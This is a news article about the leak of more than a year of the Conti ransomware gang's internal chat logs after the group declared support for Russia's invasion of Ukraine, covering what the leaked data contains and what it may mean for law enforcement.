Russian ransom gang’s data leaked

More than a year’s worth of private data belonging to Conti has been released to the public by a member who is believed to be Ukrainian, after the Russian-based ransomware group declared its support for Vladimir Putin’s invasion.

“Here is a friendly heads up that the Conti gang has just lost all their s**t,” says a message accompanying a Twitter link to the leaked data, which it adds is a “1.tgz file that can be unpacked running a tar -xzvf command.”

The statement continues: “The contents of the first [information] dump contain the chat communications - current, as of today - of the Conti ransomware gang. We promise it is very interesting.”

And ominously for the Conti group, the statement adds: “There are more dumps coming, stay tuned.”

Screen notification from anonymous data leaker

In further use of colorful language, Conti data consisting of 13 months’ worth of leaked communications from group members and affiliates was uploaded onto Github - a forum where software developers of all stripes meet online to share expertise - under the tagline “Russian warship go f**k yourself”, a reference to the killing of 13 Ukrainian border guards by Putin’s naval forces last week.

The communications were leaked from the XMPP encrypted messaging service, also known as Jabber, and also posted up on malware research groups VX Underground and Intel X after being vetted.

The data itself is in JSON format and includes bitcoin addresses, chat handles and IP addresses, Bank Info Security reported. Some of it is altogether more personal, detailing disputes and infighting between cybercriminals and negotiations with ransomware victims.

Shaken to its core

Conti is thought to operate a system whereby a hub of core members provides malware data encryption tools to ‘freelance’ operatives, who then use the so-called crypters to conduct ransomware attacks on businesses. The Conti gang takes a 30% cut of illicit proceeds gained in this way in return for facilitating the attacks.

While the data leak has been attributed to an unknown actor who cannot be named, it is thought by some that it could in fact be from a disgruntled former Conti affiliate unhappy at the core group’s decision to publicly support Putin’s invasion.

On Friday, Conti released a statement on a website it uses for its own data leaks, declaring it would avenge any cyber attacks against Russia. It has long been suspected that the ransomware group has ties to Russia’s Federal Security Service and the GRU, its central intelligence directorate.

More tough times for cyber crooks

Whoever is responsible for it, the leak has serious knock-on implications for cyber criminals, who may find themselves less able to operate with impunity. Although threat actors are unlikely to reveal their real names or addresses even on an encrypted chat forum, the leaked data could be useful to law enforcement bodies such as the FBI seeking to trace them.

Perhaps mindful of this danger, another ransomware group Lockbit has recently affirmed its apolitical stance, declaring itself to be purely a criminal group motivated by money.